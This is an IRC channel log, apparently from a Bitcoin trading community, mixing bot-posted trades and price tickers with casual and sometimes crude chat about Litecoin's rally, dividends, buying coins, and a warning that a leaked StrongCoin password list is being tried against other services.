vwap: 101.46624 Apr 02 10:47:06 Oh, shit we are falling all the way down to $100 and WallStreet is still on the sidelines Apr 02 10:50:14 wallstreet is 5874 in Mtgox queue Apr 02 10:53:30 [MPEX] [S.MPOE] 5000 @ 0.0006519 = 3.2595 BTC [+] Apr 02 10:55:58 [MPEX] [S.MPOE] 15000 @ 0.00065907 = 9.8861 BTC [+] Apr 02 10:56:01 [MPEX] [S.MPOE] 2593 @ 0.00066487 = 1.724 BTC [+] Apr 02 11:14:55 ;;ticker Apr 02 11:14:57 BTCUSD ticker | Best bid: 102.50000, Best ask: 102.66430, Bid-ask spread: 0.16430, Last trade: 102.66430, 24 hour volume: 104332.57277571, 24 hour low: 93.55000, 24 hour high: 106.00000, 24 hour vwap: 101.48545 Apr 02 11:17:37 [BTCTC] [ASICMINER-PT] 1 @ 0.756 BTC [+] Apr 02 11:27:43 [BTCTC] [S.DICE-PT] 50 @ 0.0048 = 0.24 BTC [+] Apr 02 11:57:28 [BTCTC] [BITVPS] 1 @ 0.00637 BTC [+] Apr 02 12:02:46 [MPEX] [S.DICE] 400 @ 0.00400173 = 1.6007 BTC [+] Apr 02 12:08:45 [MPEX] [S.BBET] [PAID] 50.1472201 BTC to 3`000`000 shares, 1671 satoshi per share Apr 02 12:09:01 um Apr 02 12:09:08 jesus i can't believe i fucked it up again. Apr 02 12:12:53 thrown off by the snazzy black background version? Apr 02 12:13:56 heh Apr 02 12:16:24 erhm... what was that >.> Apr 02 12:16:53 me being retarded. Apr 02 12:17:33 And can that be undone? Apr 02 12:17:45 Else I'll have to update what I paid on my PT... Apr 02 12:18:26 yep presently. Apr 02 12:21:28 Have you considered just killing the bot? Apr 02 12:21:30 [MPEX] [S.BBET] [PAID] 15.04416603 BTC to 3`000`000 shares, 501 satoshi per share Apr 02 12:21:40 there, correct dividend paid out. Apr 02 12:21:43 BingoBoingo_ which one ? Apr 02 12:21:54 good Apr 02 12:21:57 MPOE, the bot not the girl Apr 02 12:22:32 why would i kill the bot ? Apr 02 12:23:23 You need a option making bot more suited to a truly bull market. Apr 02 12:24:04 haha maybe so Apr 02 12:24:45 I know you must have consider one and suspect you may have already implemented one Apr 02 12:24:54 nope. Apr 02 12:25:24 And that is why we love you Mircea Apr 02 12:25:38 You might just be too honest for Bitcoin Apr 02 12:26:19 If there is such a thing Apr 02 12:28:31 Due to price inflexibility people who buy bonds denominated in BTC are going to have to become accustomed to losses eventually Apr 02 12:38:48 Created at: Apr 11, 2555 BE 2:15 AM Apr 02 12:38:54 lol my computer is budhists Apr 02 12:41:11 !last m s.bbet Apr 02 12:41:11 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Apr 02 12:43:53 BingoBoingo_ i'm not really sure it works that way Apr 02 12:44:46 Maybe not, but in OTC I'm about to loosen an LTC miner's asshole under this principle Apr 02 12:45:03 jhehe cool. Apr 02 12:47:20 [BTCTC] [BTC-BOND] 1 @ 0.00987 BTC [-] Apr 02 12:47:29 [BTCTC] [BTC-BOND] 1 @ 0.00987 BTC [-] Apr 02 12:47:55 [BTCTC] [BTC-BOND] 1 @ 0.00986 BTC [-] Apr 02 12:47:57 [BTCTC] [BTC-BOND] 7 @ 0.00986 = 0.069 BTC [-] Apr 02 12:48:00 [BTCTC] [BTC-BOND] 1 @ 0.00986 BTC [-] Apr 02 12:48:14 [BTCTC] [BTC-BOND] 40 @ 0.00984 = 0.3936 BTC [-] Apr 02 12:48:31 lol ltc miners asshole? Apr 02 12:48:49 i gota go but wish i had context Apr 02 12:48:51 peace Apr 02 12:58:37 anyone else thinking we are in a bubble right now? Apr 02 13:04:41 [MPEX] [S.MPOE] 3770 @ 0.00065928 = 2.4855 BTC [-] Apr 02 13:06:05 hi all Apr 02 13:06:43 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Apr 02 13:14:21 makomk malaimo microhxo_ midnightmagic MiningBuddy mircea_popescu mjr_ mjr_III mod6 molecular mpexbot Apr 02 13:14:23 hi mjr_III Apr 02 13:14:30 whats new Apr 02 13:14:34 did you see CNBC Apr 02 13:15:36 nope Apr 02 13:15:53 dumbass talking heads Apr 02 13:15:55 [MPEX] [S.MPOE] 1280 @ 0.00065928 = 0.8439 BTC [-] Apr 02 13:15:57 [MPEX] [S.MPOE] 1700 @ 0.00065443 = 1.1125 BTC [-] Apr 02 13:15:59 [MPEX] [S.MPOE] 70 @ 0.00064761 = 0.0453 BTC [-] Apr 02 13:16:15 but Maria Bartiromo seemed to enjoy hearing about it Apr 02 13:16:38 don't know why I find women who can speak intelligently about finance so damn sexy, but I do Apr 02 13:23:54 mjr_III are you sure those are women, I hear bankers can give a mean blowjob... Apr 02 13:33:21 lol Apr 02 13:34:55 [MPEX] [S.DICE] 2200 @ 0.00374867 = 8.2471 BTC [-] Apr 02 13:42:42 [BTCTC] [PAJKA.BOND] 1 @ 0.1059 BTC [+] Apr 02 13:45:01 worrisome pic of the day : http://polimedia.us/dtng/c/src/128250837142.jpg Apr 02 13:50:02 *hanbot* halloh Apr 02 13:50:50 good for leet buttsecks Apr 02 13:54:54 that was somewhat worrisome Apr 02 13:56:35 Bugpowder, is this you? http://www.reddit.com/r/Bitcoin/comments/1bhhjg/any_bitcoin_millionaires_here_on_reddit_if_so/c96s1c4 Apr 02 13:56:45 ^ mpex whale confession Apr 02 13:56:48 nope Apr 02 13:57:45 if tibby appears, someone send the link to him "ofc, its gypsy trading with himself" Apr 02 13:58:23 [MPEX] [S.MPOE] 3000 @ 0.00064949 = 1.9485 BTC [+] Apr 02 13:58:25 [MPEX] [S.MPOE] 10900 @ 0.00066175 = 7.2131 BTC [+] Apr 02 13:58:28 [MPEX] [S.MPOE] 2407 @ 0.00066487 = 1.6003 BTC [+] Apr 02 13:59:24 but yeah, and 50% feral taxes.. makes whoile thing hard to believe Apr 02 13:59:50 at least it's clear it wasn't written by mircea :DDDD Apr 02 14:00:02 *hanbot* pettext done except for the tradehill, which i'm holding for comment (to me the first paragraph seems like it's coming from an incredibly wounded, take everything personally sorta place...maybe reconsider moar concisely?) Apr 02 14:01:57 certainly is an entertaining read. Apr 02 14:03:34 well, I woke up to a little mini rally Apr 02 14:03:40 and now its fizzling Apr 02 14:03:47 guess I should go back to sleep Apr 02 14:06:39 incidentally, i have to go to tax office today to deliver my declaration Apr 02 14:06:56 they still can't get electronic servics right Apr 02 14:11:47 deposits flushed Apr 02 14:13:00 "I personally wouldn't touch anything outside of S.DICE, S.MPOE, S.BBET and ASICMINER." Apr 02 14:13:04 that sounds pretty good. Apr 02 14:14:23 jurov did you gpg sign it ? Apr 02 14:14:57 what? Apr 02 14:15:32 your declaration Apr 02 14:16:31 lol... not sure how i'd gpg sign a paper form Apr 02 14:17:22 idiots ----> http://www.youtube.com/watch?v=y1POVoi9NPk Apr 02 14:26:43 Yesterday the big move started at 11:45. The time is now 11:26 Apr 02 14:27:36 lol Apr 02 14:27:42 pavlov much ? Apr 02 14:29:21 coinbr deposits/dividends processed Apr 02 14:29:27 wish me luck guys, i found a wallet.dat from a year ago :) Apr 02 14:29:31 gl Apr 02 14:29:47 thanks Apr 02 14:30:08 good luck. i recently found very nice stash of ltc likewise :) Apr 02 14:30:11 i went through a mining phase a year ago, and i think i have some laying around, but i had redone my computer Apr 02 14:30:40 so i decided to dig through and found the wallet.dat, so as soon as its synced i'll dump it and see what i find! exciting Apr 02 14:31:05 [BTCTC] [PAJKA.BOND] 10 @ 0.09 = 0.9 BTC [-] Apr 02 14:31:25 [BTCTC] [PAJKA.BOND] 1 @ 0.1036 BTC [+] Apr 02 14:31:29 [BTCTC] [PAJKA.BOND] 2 @ 0.1035 = 0.207 BTC [-] Apr 02 14:31:29 you uncover not yet sent transaction to BTCS&T Apr 02 14:31:30 [BTCTC] [PAJKA.BOND] 1 @ 0.1031 BTC [-] Apr 02 14:31:33 [BTCTC] [PAJKA.BOND] 2 @ 0.1001 = 0.2002 BTC [-] Apr 02 14:31:35 [BTCTC] [PAJKA.BOND] 3 @ 0.1 = 0.3 BTC [-] Apr 02 14:31:42 hahaha Apr 02 14:33:32 so whats the verdict on litecoin valuation? Did it cross .02 or not? Apr 02 14:33:44 on btc-e it did not Apr 02 14:33:57 and now it appears the bubble has topped Apr 02 14:34:24 so far it hasn't neeh ? Apr 02 14:34:36 that will be one hell of a bet if it fizzles out Apr 02 14:35:21 it crossed on viturex Apr 02 14:35:41 vircurex Apr 02 14:36:27 has to cross on whatever charts thing for the bet iirc Apr 02 14:37:53 yeah that charts thing has it listed by exchange Apr 02 14:38:14 BTC-e has 97% of the volume Apr 02 14:38:33 so I would imagine thats the right cryptocoincharts chart to use Apr 02 14:38:49 unless u want to roll your own vwap Apr 02 14:42:37 ya, i feel a desperate, feverish desire & itch to run ltc vwaps Apr 02 14:47:46 im a wizard Apr 02 14:55:59 this is kinda funny Apr 02 14:56:09 somebody has been putting passwords into mpex' submit field. Apr 02 14:57:11 abracadabra Apr 02 14:57:57 holy shit Apr 02 14:58:04 this isn;'t random, this is the strongcoin list. Apr 02 14:59:25 HEY ANYONE : if you're using same pw on strongcoin and anywhere else - change it now. Apr 02 14:59:36 i bet someone's trying it in all bitcoin services automatically Apr 02 15:07:15 also Apr 02 15:07:18 dont use bitcoi-24 Apr 02 15:07:29 strongly advice against it.... Apr 02 15:07:35 gonna be a big shitstorm soon Apr 02 15:07:52 taub: why? what do you know? Apr 02 15:09:19 [MPEX] [S.MPOE] 10000 @ 0.00067877 = 6.7877 BTC [+] Apr 02 15:09:22 [MPEX] [S.MPOE] 9000 @ 0.00068141 = 6.1327 BTC [+] Apr 02 15:09:58 [MPEX] [S.DICE] 5000 @ 0.00400172 = 20.0086 BTC [+] Apr 02 15:14:29 litecoin hit .02! Apr 02 15:16:46 [MPEX] [S.DICE] 5097 @ 0.00383136 = 19.5284 BTC [-] Apr 02 15:17:58 ThickAsThieves: where? Apr 02 15:20:06 btc-e, in bitcoin terms Apr 02 15:20:12 the thing is, bitcoin on btc-e is $97. so if they are using that value for LTC/BTC ratio, then it kinda inflates the price Apr 02 15:20:48 ha Apr 02 15:21:06 I wonder if THIS is the real reason BTC is cheaper on BTC-E Apr 02 15:21:17 people are selling BTC for LTC there? Apr 02 15:21:24 nah, its because there are oodles of fees Apr 02 15:21:31 to get your fiat into BTC-e Apr 02 15:21:34 i think Apr 02 15:21:55 ;;ticker Apr 02 15:21:56 BTCUSD ticker | Best bid: 106.50003, Best ask: 107.00000, Bid-ask spread: 0.49997, Last trade: 107.00000, 24 hour volume: 106045.53962797, 24 hour low: 95.78142, 24 hour high: 107.12101, 24 hour vwap: 102.58767 Apr 02 15:22:55 Bugpowder: what is the next move? Apr 02 15:23:08 in what? Apr 02 15:23:18 buy calls Apr 02 15:23:52 until this trend shows any sign of breaking, calls look good to me Apr 02 15:25:49 [MPEX] [S.MPOE] 15033 @ 0.00068141 = 10.2436 BTC [+] Apr 02 15:27:56 [MPEX] [O.USD.C095T] 25 @ 0.27496741 = 6.8742 BTC [+] Apr 02 15:29:40 noice Apr 02 15:29:57 107.25 Apr 02 15:32:31 $vwap oix Apr 02 15:32:33 mircea_popescu: ^OIX 1 day: no data 7 day: average: 100.55698248 high: 132.18543466 low: 86.04499804 volume: 9215 btc: 4520.92582997 30 day: no data Apr 02 15:34:39 ;;bids 0 Apr 02 15:34:42 There are currently 35173579 bitcoins demanded at or over 0.0 USD, worth 9785486.7857 USD in total. | Data vintage: 0.0101 seconds Apr 02 15:47:08 ;;nethash Apr 02 15:47:08 63526.0664122 Apr 02 15:47:13 ;;estimate Apr 02 15:47:14 Next difficulty estimate | 7697118.20897 based on data since last change | 8874353.54496 based on data for last three days Apr 02 15:47:24 ;;bc,stats Apr 02 15:47:25 [BTCTC] [ASICMINER-PT] 6 @ 0.75999 = 4.5599 BTC [+] Apr 02 15:47:27 Current Blocks: 229299 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 524 blocks | Next Difficulty In About: 2 days, 22 hours, 15 minutes, and 25 seconds | Next Difficulty Estimate: 7697118.20897 | Estimated Percent Change: 14.95397 Apr 02 15:47:32 ;;slap ThickAsThieves Apr 02 15:57:55 [HAVELOCK] [SDICE] 8 @ 0.380001 = 3.04 BTC [+] Apr 02 15:57:56 [HAVELOCK] [SDICE] 2 @ 0.3800003 = 0.76 BTC [-] Apr 02 15:57:57 [HAVELOCK] [SDICE] 9 @ 0.38000002 = 3.42 BTC [-] Apr 02 15:57:59 [HAVELOCK] [SDICE] 1 @ 0.38 BTC [-] Apr 02 15:58:00 [HAVELOCK] [SDICE] 1 @ 0.377 BTC [-] Apr 02 15:58:01 [HAVELOCK] [SDICE] 1 @ 0.371 BTC [-] Apr 02 15:58:02 [HAVELOCK] [SDICE] 2 @ 0.3700001 = 0.74 BTC [-] Apr 02 15:58:03 [HAVELOCK] [SDICE] 8 @ 0.37000001 = 2.96 BTC [-] Apr 02 15:58:03 [HAVELOCK] [SDICE] 8 @ 0.37 = 2.96 BTC [-] Apr 02 15:58:55 [HAVELOCK] [SDICE] 7 @ 0.37 = 2.59 BTC [-] Apr 02 16:10:12 Guys, anyone willing to sell 1 bitcoin? Apr 02 16:14:21 or half a bitcoin? Apr 02 16:14:30 All the sites are showing empty.. Apr 02 16:14:46 [MPEX] [S.DICE] 200 @ 0.00400173 = 0.8003 BTC [+] Apr 02 16:15:08 microhxo you know how to use gribble's order book ? Apr 02 16:15:34 Just got into bitcoins, no idea. Whats the easiest way to buy a bitcoin personally? Apr 02 16:15:47 http://bitcoin-otc.com/vieworderbook.php Apr 02 16:15:52 look there. some people are selling. Apr 02 16:15:57 talk to them. Apr 02 16:15:58 Thanks Apr 02 16:20:55 [HAVELOCK] [VTX] 2 @ 0.5671 = 1.1342 BTC [-] Apr 02 16:23:23 Btcx.se are looking to loan USD either Bitstamp or Mtgox, as we are all out of float. We are willing to pay 1% in Interest, the money will be paid back sometime this week, as we are waiting on our wire to hit gox. Apr 02 16:24:45 microhxo: didnt we just go through this exercise? Apr 02 16:25:01 Yea its for another friend Apr 02 16:25:18 My friend yesterday was able to buy on coinbase. Apr 02 16:25:41 i will sell for moneypak Apr 02 16:25:51 Now another friend wants to buy on coinbase (I know we discussed they are noobish, but they link bank account immediately) and they aren't available to sell till friday. Apr 02 16:25:58 How does he setup a moneypak? Apr 02 16:26:06 you go to walmarr Apr 02 16:26:14 walmart and buy it Apr 02 16:28:07 price is gonna increase if these sites like coinbase are having coin shortages Apr 02 16:29:28 [BTCTC] [S.MPOE-PT] 14 @ 0.000675 = 0.0095 BTC [+] Apr 02 16:29:45 wow an mpoe rally Apr 02 16:29:51 !ticker H HIM Apr 02 16:29:53 [HAVELOCK:HIM] 1D: 2.05990000 / 2.0599 / 2.05990000 (2 shares, 4.11980000 BTC), 7D: 1.65000000 / 1.89730359 / 2.08000000 (167 shares, 316.84969996 BTC), 30D: 1.40000000 / 1.78841844 / 2.08000000 (735 shares, 1314.48755265 BTC) Apr 02 16:29:57 Ok so if he gets the moneypak and gives it to you, you will send to his wallet? He is afraid he might lose out Apr 02 16:30:18 yes. but smickles is the escrow agent Apr 02 16:30:34 smickles will make sure your friend gets coin Apr 02 16:30:56 also I charge 2% of the spot Apr 02 16:31:00 nice Apr 02 16:31:10 I'll see if he can go at lunch and get one. Apr 02 16:31:52 i have up to 1 coin available atm i would prefer to just sell a half coin so I can re-up easier Apr 02 16:32:16 sure Apr 02 16:32:47 kay lemme check my accounts real quick Apr 02 16:36:35 hmm if I sell it may come as a loss... :( Apr 02 16:36:58 unless I charge more but I dont want to be senior greedy Apr 02 16:37:10 lol Apr 02 16:37:39 Is Bitinstant out? Apr 02 16:37:39 well its ok. It seems we missed the boat. Everyone is buying and its hard to even get in. He can wait till the dust settles and see whats up. Apr 02 16:37:43 http://www.resellerratings.com/store/BitInstant Apr 02 16:37:47 seems like they are. Apr 02 16:37:55 as per recent reviews. Apr 02 16:38:03 bitinstant doesnt even have gox codes? Apr 02 16:39:09 bitinstant is up all reserves up Apr 02 16:39:30 get coupons for mtgox and trade there Apr 02 16:40:06 you ca give cash to wal mart and get mtgox code deposted to your account in like 20 minutes Apr 02 16:40:45 ;;ticker Apr 02 16:40:46 BTCUSD ticker | Best bid: 107.32000, Best ask: 107.88000, Bid-ask spread: 0.56000, Last trade: 107.66900, 24 hour volume: 102970.96829906, 24 hour low: 98.40000, 24 hour high: 108.00000, 24 hour vwap: 102.92464 Apr 02 16:42:06 Is there some directions on how to get the coupons from walmart? Apr 02 16:43:45 [MPEX] [S.MPOE] 6100 @ 0.00067351 = 4.1084 BTC [-] Apr 02 16:46:02 read the bitinstant faq Apr 02 16:46:16 if their reserves are up they have coin Apr 02 16:54:30 [MPEX] [S.MPOE] 5000 @ 0.00067536 = 3.3768 BTC [+] Apr 02 17:01:43 assbot & co going down for maintenance Apr 02 17:13:13 https://bitcointalk.org/index.php?topic=164495.0;all Apr 02 17:13:19 lmao. coinbase no longer locking quotes. Apr 02 17:13:28 so vessenes ran out of bitcoin foundation float ? Apr 02 17:13:28 HAHAHAHAHA Apr 02 17:13:38 Wow.... Apr 02 17:13:44 thats funny Apr 02 17:14:23 looks like as logn as you hold any crypto you're okay Apr 02 17:14:40 litecoin having it's little bubble Apr 02 17:17:39 https://b1tm3.wordpress.com/2013/04/01/a-visit-to-mt-gox/ Apr 02 17:17:46 and uh yea Apr 02 17:17:48 idiots blogging, aguide. Apr 02 17:17:56 bitcoin-24 doesn't use transactions in it's database Apr 02 17:17:58 so Apr 02 17:18:00 visit to mtgox article illustrated with a low quality outdoor shot, Apr 02 17:18:04 a stolen image of a law book Apr 02 17:18:08 and a graph capture. Apr 02 17:18:20 what i want to know is who replaces brains with pudding. Apr 02 17:21:34 ;;ticker Apr 02 17:21:36 BTCUSD ticker | Best bid: 106.92500, Best ask: 106.95253, Bid-ask spread: 0.02753, Last trade: 106.98379, 24 hour volume: 90737.35999842, 24 hour low: 98.70342, 24 hour high: 108.00000, 24 hour vwap: 103.52987 Apr 02 17:29:31 "10x per month continuously is too much, but S.BBET is probably on a trajectory to surpass S.DICE is markey capitalization eventually for the simple reason that dice are boring while Kim Jung Un and Carlos Beltran are not." Apr 02 17:29:32 kakobreklaa ^ Apr 02 17:29:34 you has fans. Apr 02 17:34:33 Looking to borrow USD on Bitstamp or MtGox more info at https://bitcointalk.org/index.php?topic=164907.msg1722022#msg1722022 Apr 02 17:34:43 mircea_popescu: what hosting does bbet use? Apr 02 17:34:59 something shitty. why ? Apr 02 17:36:08 i want hosting i can pay for with my btc revenue Apr 02 17:36:17 but at this point i might as well use rackspace Apr 02 17:36:23 thestringpuller: we accept btc for all our hosting www.lightbox.org Apr 02 17:36:34 you do hosting too ? Apr 02 17:36:43 i do it all, lol Apr 02 17:36:53 DeadTerra, I guess you mean to Borrow rather than Lend Apr 02 17:37:01 lol Apr 02 17:37:25 cool Apr 02 17:37:28 well hdd is being replaced Apr 02 17:37:31 my "real" business is web development and hosting Apr 02 17:37:32 and im not there Apr 02 17:37:38 so dunno wtf are they dreaming Apr 02 17:38:36 mircea_popescu: pm Apr 02 17:42:21 mircea_popescu: why is the bot not quoting Apr 02 17:42:47 bm Apr 02 17:42:49 nvm Apr 02 17:42:54 jesus simmer down Apr 02 17:44:16 ziggap officially late on their BTCJam loan Apr 02 17:45:02 that;s promising. Apr 02 17:46:02 sad too, aethero has a very high otc rating Apr 02 17:46:08 kinda undemrines it Apr 02 17:46:14 undermines* Apr 02 17:46:33 myea. Apr 02 17:46:41 the old club is coming apart. Apr 02 17:49:12 https://bitcointalk.org/index.php?topic=164772.msg1721424#msg1721424 apparently tradefortress is tyrying to grow tits and generally become mpoe-pr Apr 02 17:51:01 <[\\\]> dude, high otc ratings are obsolete Apr 02 17:51:04 <[\\\]> its all about gettrust Apr 02 17:51:08 <[\\\]> total rating is meaningless Apr 02 17:51:26 <[\\\]> if you don't trust the people that have given the high ratings, they mean nothing Apr 02 17:51:31 lol otc are gone and done my friend Apr 02 17:51:41 otc rating get real Apr 02 17:51:45 <[\\\]> lol. they aren't and you aren't my friend. Apr 02 17:52:02 ok Apr 02 17:52:47 ziggap is an interesting case study also, in that it shows how an issuer can tank its own stock, to buy it back if they want. "oh sorry guys i was just shitty for week, s'all good now!" Apr 02 17:52:55 ;;ticker Apr 02 17:52:56 BTCUSD ticker | Best bid: 107.48000, Best ask: 107.89800, Bid-ask spread: 0.41800, Last trade: 107.48000, 24 hour volume: 88974.99780378, 24 hour low: 98.70342, 24 hour high: 108.85699, 24 hour vwap: 103.84469 Apr 02 17:53:34 ThickAsThieves why else do you think bbet is down? Apr 02 17:54:02 just go offline for a few days Apr 02 17:54:04 ZedsterX i use them. that's all. Apr 02 17:54:09 you can get it way down Apr 02 17:54:11 :) Apr 02 17:54:45 "Havent seen kako in like 10min, it's not looking good guys!" Apr 02 17:54:50 scam. Apr 02 17:55:21 ping Apr 02 17:55:39 (keeping my presence) Apr 02 17:55:40 now you must do this every 6 3/4 seconds Apr 02 17:55:42 ping Apr 02 17:55:43 or else Apr 02 17:56:02 ooo its dipping Apr 02 17:56:04 ping Apr 02 17:56:14 also bitbet is not down Apr 02 17:56:17 it's alternatively up Apr 02 17:56:43 ;)) Apr 02 17:56:52 should be any minute now Apr 02 17:57:14 ;;seen kakobreklaa Apr 02 17:57:14 kakobreklaa was last seen in #bitcoin-assets 21 seconds ago: should be any minute now Apr 02 17:57:19 phew Apr 02 17:57:39 ping Apr 02 17:57:44 guise i think there's something afoot with this bitbet Apr 02 17:57:50 also some pixels. Apr 02 17:57:57 :D Apr 02 17:57:58 did you close the litecoin bet? Apr 02 17:58:11 i can load the site but it comes up without the milk in it Apr 02 17:58:34 hey it actually is down Apr 02 17:58:49 FUD Apr 02 17:59:36 "It's not just you! http://bitbet.us looks down from here." Apr 02 17:59:53 it's not responding to http Apr 02 18:00:11 should i use FTP? Apr 02 18:01:20 ;;bids 0 Apr 02 18:01:23 There are currently 35042494 bitcoins demanded at or over 0.0 USD, worth 10000908.5754 USD in total. | Data vintage: 0.0104 seconds Apr 02 18:01:32 ;;asks 110 Apr 02 18:01:33 There are currently 7494.0481 bitcoins offered at or under 110.0 USD, worth 818197.310859 USD in total. | Data vintage: 9.5767 seconds Apr 02 18:03:06 LTC/BTC .0283 Apr 02 18:04:52 no shit! i was gonna buy some yesterday. shoulda when it was still .15 Apr 02 18:04:59 oops. .015 Apr 02 18:05:28 i feel like as soon as i buy it will die Apr 02 18:05:33 just mine instead Apr 02 18:06:22 feel the same since 0.40c$ :/ Apr 02 18:11:00 ok we have signal Apr 02 18:11:49 lies Apr 02 18:14:11 lies, yep Apr 02 18:14:57 thestringpuller: do you need me to escrow something? Apr 02 18:15:57 ;;seen scamkobreklaa Apr 02 18:15:57 I have not seen scamkobreklaa. Apr 02 18:17:55 too bad orkaa isn't ~kakobreklaa@188-230-165-22.dynamic.t-2.net, 'cause it would make a tight circle since kakobreklaa is ~orkaa@89-212-41-49.static.t-2.net Apr 02 18:18:30 slovenia is a small country Apr 02 18:20:50 aw shut up Apr 02 18:21:50 ;;ticker Apr 02 18:21:51 BTCUSD ticker | Best bid: 107.92001, Best ask: 108.45000, Bid-ask spread: 0.52999, Last trade: 108.45000, 24 hour volume: 82915.61103441, 24 hour low: 98.70342, 24 hour high: 108.85699, 24 hour vwap: 103.92838 Apr 02 18:22:08 <[\\\]> oops Apr 02 18:22:11 <[\\\]> ping Apr 02 18:23:02 pong Apr 02 18:23:23 smickles: do you have time to talk for a minute? Apr 02 18:23:40 via pm Apr 02 18:25:03 <[\\\]> uh oh Apr 02 18:25:05 <[\\\]> seekrets Apr 02 18:28:24 lol Apr 02 18:34:59 i very much dislike these fucking cloudflare sited Apr 02 18:36:56 ;;ticker Apr 02 18:36:57 BTCUSD ticker | Best bid: 108.22002, Best ask: 108.48800, Bid-ask spread: 0.26798, Last trade: 108.22002, 24 hour volume: 81121.83037847, 24 hour low: 98.76000, 24 hour high: 108.85699, 24 hour vwap: 104.05417 Apr 02 18:37:11 ;;bids 80 Apr 02 18:37:14 There are currently 49646.565 bitcoins demanded at or over 80.0 USD, worth 4622143.08274 USD in total. | Data vintage: 0.0060 seconds Apr 02 18:37:22 There are currently 16644.918 bitcoins offered at or under 120.0 USD, worth 1866881.56113 USD in total. | Data vintage: 8.3149 seconds Apr 02 18:37:39 ;;market --sell 40000 Apr 02 18:37:39 A market order to sell 40000 bitcoins right now would net 3816457.6631 USD and would take the last price down to 87.1000 USD, resulting in an average price of 95.4114 USD/BTC. | Data vintage: 25.8565 seconds Apr 02 18:37:47 ;;market --sell 50000 Apr 02 18:37:47 A market order to sell 50000 bitcoins right now would net 4650159.1334 USD and would take the last price down to 79.0000 USD, resulting in an average price of 93.0032 USD/BTC. | Data vintage: 33.5197 seconds Apr 02 18:38:14 A market order to sell 100000 bitcoins right now would net 7695564.9021 USD and would take the last price down to 39.4370 USD, resulting in an average price of 76.9556 USD/BTC. | Data vintage: 60.9398 seconds Apr 02 18:39:03 smickles werd. Apr 02 18:45:42 .03 ltc/btc Apr 02 18:46:00 .031 actually Apr 02 18:48:09 ;;ticker Apr 02 18:48:11 BTCUSD ticker | Best bid: 107.51000, Best ask: 107.99999, Bid-ask spread: 0.48999, Last trade: 107.99999, 24 hour volume: 79640.72953468, 24 hour low: 99.00000, 24 hour high: 108.85699, 24 hour vwap: 104.15616 Apr 02 18:49:45 .038 ... Apr 02 18:50:18 ! Apr 02 18:50:28 shit's about to happen Apr 02 18:50:53 Where are you seeing those prices? Apr 02 18:51:25 nvm Apr 02 18:51:28 what i saw was volatility dropping for ~20 min then reversing Apr 02 18:52:03 (rather, at least 20 min. i don't really keep it displayed past that) Apr 02 19:04:22 ;;ticker Apr 02 19:04:23 BTCUSD ticker | Best bid: 107.07900, Best ask: 107.08001, Bid-ask spread: 0.00101, Last trade: 107.08001, 24 hour volume: 77482.04306367, 24 hour low: 99.00000, 24 hour high: 108.85699, 24 hour vwap: 104.22204 Apr 02 19:08:54 Confirmed total: 5,038 BTC Apr 02 19:08:58 teh bitbets r us~! Apr 02 19:11:07 [MPEX] [S.MPOE] 1800 @ 0.00067644 = 1.2176 BTC [+] Apr 02 19:14:54 [HAVELOCK] [SDICE] 1 @ 0.4199998 BTC [+] Apr 02 19:15:55 [HAVELOCK] [VTX] 2 @ 0.5669998 = 1.134 BTC [-] Apr 02 19:15:56 [HAVELOCK] [VTX] 1 @ 0.5669998 BTC [-] Apr 02 19:19:06 ;;tslb Apr 02 19:19:08 Time since last block: 3 minutes and 47 seconds Apr 02 19:20:14 [BTCTC] [ASICMINER-PT] 1 @ 0.759998 BTC [+] Apr 02 19:20:47 The litecoin price is just silly. It is not beeing developed, isn't used and has 4 times the supply of Bitcoin (and Namecoin). Apr 02 19:22:58 ltc just halved in price in like 10min Apr 02 19:23:00 lol Apr 02 19:23:09 its a rollercoaster Apr 02 19:25:42 how's the quote go? Apr 02 19:26:07 nothing stopping an overpriced asset from going up Apr 02 19:27:33 Hearing people discuss selling BTC for LTC makes me chuckle. Apr 02 19:28:32 all of the assets at litecoinglobal have been gutted Apr 02 19:28:43 bids are miniscule Apr 02 19:29:54 [HAVELOCK] [KCIM] 1 @ 1.00100011 BTC [-] Apr 02 19:32:14 is it now >4$ per ltc? Apr 02 19:37:09 back and forth around there Apr 02 19:37:17 site is buckling Apr 02 19:37:45 and down Apr 02 19:41:17 ;;bc,stats Apr 02 19:41:27 blocks are rainign today or something Apr 02 19:41:28 Current Blocks: 229328 | Current Difficulty: 6695826.2825963 | Next Difficulty At Block: 229823 | Next Difficulty In: 495 blocks | Next Difficulty In About: 2 days, 21 hours, 52 minutes, and 56 seconds | Next Difficulty Estimate: 7692540.75813 | Estimated Percent Change: 14.88561 Apr 02 19:41:36 sup all Apr 02 19:41:49 lookin at the bbet logs i thought something was broken Apr 02 19:41:55 but they are just that fast Apr 02 19:42:53 [BTCTC] [GSDPT] 100 @ 0.0038 = 0.38 BTC [-] Apr 02 19:43:18 CNBC just had a story on bitcion for the second day in a row Apr 02 19:43:35 this one was on "Santelli Exchange" and he interviewed the creator of the bitcoin ATM Apr 02 19:45:10 [BTCTC] [GSDPT] 1 @ 0.0036 BTC [-] Apr 02 19:45:11 [BTCTC] [GSDPT] 1 @ 0.0036 BTC [-] Apr 02 19:45:36 cool Apr 02 20:03:58 ;;ticker Apr 02 20:04:00 BTCUSD ticker | Best bid: 107.80017, Best ask: 107.80018, Bid-ask spread: 0.00001, Last trade: 107.80018, 24 hour volume: 74100.21772772, 24 hour low: 99.00000, 24 hour high: 108.85699, 24 hour vwap: 104.44244 Apr 02 20:05:24 $vwap oix Apr 02 20:05:25 TomServo: ^OIX 1 day: no data 7 day: average: 100.55698248 high: 132.18543466 low: 86.04499804 volume: 9215 btc: 4520.92582997 30 day: no data Apr 02 20:06:45 logged into vircurex after several months... yup, 300 ltc :P Apr 02 20:07:44 time to crash the market Apr 02 20:07:48 I found a 10 spot in a old jacket once. Apr 02 20:08:38 lol Apr 02 20:17:58 now i logged on btc-e... found even bigger ltc stash O.o Apr 02 20:18:39 LTC/BTC Bid (U) 0.00101 BTC 500 LTC 0.505 BTC Apr 02 20:18:40 10:41 04.04.12 Apr 02 20:18:49 lulzy trade hsitory Apr 02 20:18:50 whatyagonnado? Apr 02 20:19:25 throw them out of helicopter? Apr 02 20:22:55 [HAVELOCK] [VTX] 2 @ 0.5669998 = 1.134 BTC [-] Apr 02 20:23:01 site is barely usable atm Apr 02 20:23:28 btc-e? yes, one has to wait Apr 02 20:25:54 [HAVELOCK] [VTX] 1 @ 0.56699978 BTC [-] Apr 02 20:26:10 [MPEX] [S.MPOE] 7850 @ 0.00067413 = 5.2919 